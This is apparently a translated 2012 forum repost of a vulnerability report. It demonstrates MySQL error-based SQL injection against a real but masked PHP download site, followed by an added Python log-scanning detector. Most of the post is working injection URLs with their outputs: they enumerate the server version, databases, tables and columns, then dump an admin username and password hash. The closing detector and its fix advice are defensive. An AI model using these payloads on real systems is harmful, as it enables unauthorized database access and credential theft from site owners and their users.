PHP + MySQL advanced error-based injection, tested and confirmed working

Posted on 2012-9-13 17:52:09
http://www.wooyun.org/bugs/wooyun-2010-01666

I had wanted to find one to test on and didn't expect to find it here; it can be tested, this is just for the record.

http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003

/data0/htdocs/leqi_new/app/myapp.php

Or:

/**********version()**********/ 5.1.49-log
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********user()**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********database()**********/  leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********enumerate database names one at a time with limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
information_schema
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
test

/**********enumerate table names one at a time with limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
users

/**********enumerate column names one at a time with limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
user_id,username,nickname,passwd,group_id
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
11 21
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
11 341 351 361

/**********dump data**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
admin
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
6a8b4574ca231eb8bd52764d4978ffcd

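
Every request in the post above has the same shape: a `count(*)` with `group by` over `information_schema.tables`, where the grouping key is `concat(<sub-select>, floor(rand(0)*2))`, so the selected value comes back inside MySQL's duplicate-key error. As an added example (not part of the original post), the sketch below flags that shape in web access logs. The log lines, IP addresses, shortened paths and the three-marker threshold are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus
# Structural markers of the duplicate-key (floor/rand/group by) error-based pattern.
MARKERS = {
    "floor_rand": re.compile(r"floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\)"),
    "count_star": re.compile(r"count\s*\(\s*\*\s*\)"),
    "group_by": re.compile(r"group\s+by\s+\w+"),
    "info_schema": re.compile(r"information_schema\s*\.\s*\w+"),
    "concat_subselect": re.compile(r"concat\s*\(.*\(\s*select\b", re.S),
}
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)
LOG_LINE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def normalise(text):
    """Undo up to three layers of URL encoding, drop inline SQL comments, lowercase."""
    for _ in range(3):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return INLINE_COMMENT.sub(" ", text).lower()

def matched_markers(target):
    text = normalise(target)
    return {name for name, rx in MARKERS.items() if rx.search(text)}

def is_error_based_probe(target):
    """Flag floor(rand()*2) only when at least two other markers accompany it."""
    hits = matched_markers(target)
    return "floor_rand" in hits and len(hits) >= 3

def scan(log_lines):
    """Yield (client_ip, sorted marker names) for matching combined-format lines."""
    for line in log_lines:
        m = LOG_LINE.match(line)
        if m and is_error_based_probe(m.group(2)):
            yield m.group(1), sorted(matched_markers(m.group(2)))

# Constructed sample log lines (documentation IP ranges, shortened hypothetical paths).
SAMPLE_LOG = [
    '198.51.100.7 - - [13/Sep/2012:17:40:01 +0800] "GET /download/id/1600003/wapc HTTP/1.1" 200 512',
    "203.0.113.9 - - [13/Sep/2012:17:41:12 +0800] \"GET /download/id/1'+or+1=(select+1+from+"
    "(select+count(*),concat((select+version()),floor(rand(0)*2))x+from+"
    'information_schema.tables+group+by+x)a)%23/wapc HTTP/1.1" 200 731',
    '198.51.100.7 - - [13/Sep/2012:17:42:30 +0800] "GET /search?q=group+by+tutorial HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    print(list(scan(SAMPLE_LOG)))
```

Log matching of this kind is a backstop. The fix for the flaw itself is to bind the `id` path segment as a query parameter and to stop returning database error text to the client.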